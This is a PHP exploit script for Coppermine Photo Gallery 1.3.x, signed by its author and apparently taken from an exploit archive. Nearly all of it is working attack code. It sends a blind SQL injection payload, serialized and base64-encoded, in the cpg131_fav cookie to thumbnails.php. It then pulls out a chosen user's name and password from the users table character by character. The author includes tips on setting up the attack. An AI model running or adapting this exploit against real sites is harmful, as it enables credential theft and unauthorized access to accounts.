Coppermine Photo Gallery 1.3.x Remote Blind SQL Injection Exploit

<? #&nbsp;Coppermine&nbsp;Photo&nbsp;Gallery&nbsp;1.3.x&nbsp;Blind&nbsp;SQL&nbsp;Injection&nbsp;Exploit #&nbsp;by&nbsp;s0cratex,&nbsp;RTM&nbsp;Member #&nbsp;Visit:&nbsp;www.zonartm.org /* You&nbsp;need&nbsp;make&nbsp;a&nbsp;small&nbsp;work...&nbsp;Add&nbsp;a&nbsp;fav&nbsp;pic,&nbsp;enter&nbsp;to&nbsp;the&nbsp;site&nbsp;and&nbsp;add /addfav.php?pid=2&nbsp;for&nbsp;example..xD ...&nbsp;in&nbsp;the&nbsp;line:&nbsp;if(eregi(\"download\",fgets($cnx2))){&nbsp;$pass.=chr($i);&nbsp;echo chr($i);&nbsp;break;&nbsp;}&nbsp;&nbsp;} the&nbsp;word&nbsp;\"download\"&nbsp;depends&nbsp;of&nbsp;the&nbsp;language... */ #&nbsp;saludos&nbsp;a&nbsp;rgod,&nbsp;OpTix,&nbsp;crypkey&nbsp;\'n&nbsp;mechas... error_reporting(0); ini_set(\"max_execution_time\",0); ini_set(\"default_socket_timeout\",5); $host&nbsp;=&nbsp;\"localhost\";&nbsp;$path&nbsp;=&nbsp;\"/cpg\";&nbsp;$port&nbsp;=&nbsp;\"80\"; $id&nbsp;=&nbsp;\"1\"; echo&nbsp;\"Coppermine&nbsp;Photo&nbsp;Gallery&nbsp;1.3.x&nbsp;fav&nbsp;Blind&nbsp;SQL&nbsp;Injection&nbsp;Exploit \"; echo&nbsp;\"-------------------------------------------------------------- \"; echo&nbsp;\" \"; echo&nbsp;\"Username&nbsp;->&nbsp;\"; $j&nbsp;=&nbsp;1;&nbsp;$user&nbsp;=&nbsp;\"\"; while(!strstr($user,chr(0))){ for($x=0;$x<255;$x++){ $xpl&nbsp;=&nbsp;\"\'\')&nbsp;OR&nbsp;1=(SELECT&nbsp;(IF((ASCII(SUBSTRING(user_name,\".$j.\",1))=\".$x.\"),1,0))&nbsp;FROM&nbsp;cpg131_users&nbsp;WHERE&nbsp;user_id=\".$id.\")/*\"; $xpl&nbsp;=&nbsp;\"a:1:{i:0;s:\".strlen($xpl).\":\"\".$xpl.\"\";}\"; $xpl&nbsp;=&nbsp;base64_encode($xpl); $cnx&nbsp;=&nbsp;fsockopen($host,$port); fwrite($cnx,&nbsp;\"GET&nbsp;\".$path.\"/thumbnails.php?album=favpics&nbsp;HTTP/1.0 Cookie:&nbsp;cpg131_fav=\".$xpl.\" \"); while(!feof($cnx)){ if(eregi(\"download\",fgets($cnx))){&nbsp;$user.=chr($x);&nbsp;echo&nbsp;chr($x);&nbsp;break;&nbsp;}&nbsp;&nbsp;} fclose($cnx); if&nbsp;($x==255)&nbsp;{ die(\" &nbsp;Try&nbsp;again...\");&nbsp;} } $j++; } echo&nbsp;\" \"; echo&nbsp;\"Password&nbsp;->&nbsp;\"; $a&nbsp;=&nbsp;1;&nbsp;$pass&nbsp;=&nbsp;\"\"; while(!strstr($pass,chr(0))){ for($i=0;$i<255;$i++){ $xpl&nbsp;=&nbsp;\"\'\')&nbsp;OR&nbsp;1=(SELECT&nbsp;(IF((ASCII(SUBSTRING(user_password,\".$a.\",1))=\".$i.\"),1,0))&nbsp;FROM&nbsp;cpg131_users&nbsp;WHERE&nbsp;user_id=\".$id.\")/*\"; $xpl&nbsp;=&nbsp;\"a:1:{i:0;s:\".strlen($xpl).\":\"\".$xpl.\"\";}\"; $xpl&nbsp;=&nbsp;base64_encode($xpl); $cnx2&nbsp;=&nbsp;fsockopen($host,$port); fwrite($cnx2,&nbsp;\"GET&nbsp;\".$path.\"/thumbnails.php?album=favpics&nbsp;HTTP/1.0 Cookie:&nbsp;cpg131_fav=\".$xpl.\" \"); while(!feof($cnx2)){ if(eregi(\"download\",fgets($cnx2))){&nbsp;$pass.=chr($i);&nbsp;echo&nbsp;chr($i);&nbsp;break;&nbsp;} } fclose($cnx2); if&nbsp;($i==255)&nbsp;{ die(\" &nbsp;Try&nbsp;again...\");&nbsp;} } $a++; } echo&nbsp;\"-------------------------------------------------------------- \"; echo&nbsp;\"s0cratex@zonartm.org&nbsp;||&nbsp;if&nbsp;you&nbsp;speak&nbsp;spanish->MSN:&nbsp;s0cratex@hotmail.com&nbsp;..xD \"; echo&nbsp;\"www.zonartm.org/blog/s0cratex \"; echo&nbsp;\"plexinium.com&nbsp;comming&nbsp;soon&nbsp;<-&nbsp;Hacking&nbsp;Nica \"; ?> &nbsp;